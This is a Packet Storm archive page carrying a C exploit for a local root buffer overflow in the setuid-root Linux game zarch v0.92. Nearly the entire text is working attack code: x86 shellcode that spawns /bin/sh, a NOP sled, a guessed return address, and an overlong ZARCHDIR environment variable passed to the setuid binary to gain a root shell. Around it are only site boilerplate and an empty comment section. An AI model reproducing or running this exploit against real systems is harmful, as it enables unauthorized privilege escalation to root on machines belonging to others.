Linux /usr/games/zarch v.92 local root buffer overflow exploit.
e4b8a65eb01c952a88aa9f45824a4c9e/* (linux)zarch[v0.92] buffer overflow, by v9[v9@fakehalo.org]. this is a misc.
exploit for the linux-SVGAlib zarch game based on "virus". which, is setuid
root. i used an old perl script i made to find this, since i don't know if
the source to this is public. (getenv.pl, binary scanner.)
note: this was built for the static binary version. (zarch v0.92) */
#define PATH "/usr/games/zarch" // pathname, which probably needs changing.
#define BUFFER_SIZE 264 // don't change this.
#define DEFAULT_OFFSET 200 // offset that worked for me.
static char exec[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[BUFFER_SIZE];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
printf("*** (linux)zarch[v0.92] local buffer overflow, by: v9[v9@fakehalo.org]"
".\n");
printf("*** return address: 0x%lx, offset: %d.\n",ret,offset);
printf("*** note: you may need to press enter to see the shell prompt.\n\n");
for(i=0;i<(260-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
*(long *)&bof[i+strlen(exec)]=ret;
bof[BUFFER_SIZE]=0;
setenv("ZARCHDIR",bof,1);
if(execlp(PATH,"zarch",0)){
printf("error: program execution failed, check the pathname.\n");
exit(0);
}
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!